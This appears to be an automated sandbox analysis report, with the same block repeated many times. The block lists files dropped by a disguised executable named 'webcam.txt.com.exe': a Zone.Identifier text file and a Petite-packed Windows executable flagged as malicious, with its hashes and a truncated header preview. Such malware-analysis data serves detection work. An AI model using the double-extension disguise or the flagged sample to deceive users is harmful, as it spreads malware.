                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows, Petite compressed
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):25353
                                                                                                                                                                                                          Entropy (8bit):7.6779311440910325
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:768:MkU46BWNXm/qDy3EJLvWGNk+pg9RakWFsy+V:HQWN7y3QLPfg9R0F3+V
                                                                                                                                                                                                          MD5:0E17DBEC1904B7C10614BFB29EF758FD
                                                                                                                                                                                                          SHA1:B19765F00D764E9FEAE654C9223D124B1A874361
                                                                                                                                                                                                          SHA-256:B9B8E6D43CE8770733B490D6B98C61F84AE5D5D9E170ADA6F034128D0BA9085F
                                                                                                                                                                                                          SHA-512:6DD92CF0D1D828880F1ED476F64FA746C6DCC2E9CBCAF369182BF5E4E096068458402D3E3D080F97CE6AE4762A2219443FC43730CB0E207E5EC14A3BE27B6A34
                                                                                                                                                                                                          Malicious:true
                                                                                                                                                                                                          Preview:MZ......................@.......................................k"_V/C1./C1./C1.._?.#C1..\;.4C1./C0.pC1..Kl."C1..\:.*C1..E7..C1.Rich/C1.........Compressed by Petite (c)1999 Ian Luck...PE..L....;@.................P..........B........`....@..................................................................................................................................................................................................................V..................`....petite..............^..............@..@....................................`...................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                          Process:C:\Users\user\Desktop\webcam.txt.com.exe
                                                                                                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):26
                                                                                                                                                                                                          Entropy (8bit):3.95006375643621
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
